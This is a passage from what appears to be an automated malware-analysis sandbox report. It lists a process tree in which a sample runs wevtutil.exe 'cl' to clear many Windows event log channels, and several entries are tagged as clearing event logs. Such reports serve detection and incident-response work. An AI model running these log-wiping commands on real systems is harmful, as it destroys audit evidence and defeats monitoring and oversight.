    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    - Clears Windows event logs
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    - Clears Windows event logs
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    - Clears Windows event logs
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:1920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    - Clears Windows event logs
    PID:2040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:2036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
    3⤵
    PID:840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
    3⤵
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
    3⤵
    - Clears Windows event logs
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
    3⤵
    - Clears Windows event logs
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
    3⤵
    PID:1900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
    3⤵
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
    3⤵
    - Clears Windows event logs
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:1920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    - Clears Windows event logs
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:2040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:2036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    - Clears Windows event logs
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    - Clears Windows event logs
    PID:840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:1900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    - Clears Windows event logs
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    - Clears Windows event logs
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    - Clears Windows event logs
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    PID:1228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:1560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:1812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    PID:672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    - Clears Windows event logs
    PID:1916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    - Clears Windows event logs
    PID:852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    PID:1920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    - Clears Windows event logs
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:2040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:2036
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    PID:828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    PID:1436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:1244
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    PID:1220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    - Clears Windows event logs
    PID:452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:1624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    - Clears Windows event logs
    PID:576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:1008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:1772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    PID:1188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    - Clears Windows event logs
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    PID:1896
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    - Clears Windows event logs
    PID:1100
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    PID:1292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:1612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    PID:668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:1296
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    PID:476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:1496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:1752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    PID:1080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:1448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    PID:1684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1228
